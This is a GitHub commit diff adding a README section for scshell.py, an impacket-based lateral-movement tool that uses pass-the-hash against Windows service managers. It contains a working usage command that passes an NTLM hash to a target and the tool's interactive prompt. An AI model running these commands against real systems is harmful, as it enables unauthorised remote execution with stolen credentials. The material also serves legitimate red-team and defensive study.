Skip to content

Commit b8f0736

Browse files
authored
Update README.md
1 parent f497421 commit b8f0736

File tree

1 file changed

+18
-1
lines changed

1 file changed

+18
-1
lines changed

README.md

+18-1
Original file line numberDiff line numberDiff line change
@@ -53,7 +53,24 @@ I'm using the XblAuthManager as the target which is the Xbox Accessory Managemen
5353

5454
# Passing the Hash
5555

56-
You can use the utility to pass the hash. By default the current process token will be used. You can set the current process token using standard pass the hash approach.
56+
scshell.py is a python2 & 3 implementation of SCShell. Using impacket project it can easily be used to perform the same lateral movement using pass the hash.
57+
58+
Installation
59+
```
60+
pip install impacket
61+
```
62+
63+
Usage
64+
```
65+
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
66+
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
67+
68+
[*] Command need to use FULL path. No command output.
69+
SCShell>
70+
71+
```
72+
73+
You can use the `C` utility to pass the hash. By default the current process token will be used. You can set the current process token using standard pass the hash approach.
5774

5875
On the local system
5976
```

0 commit comments

Comments
 (0)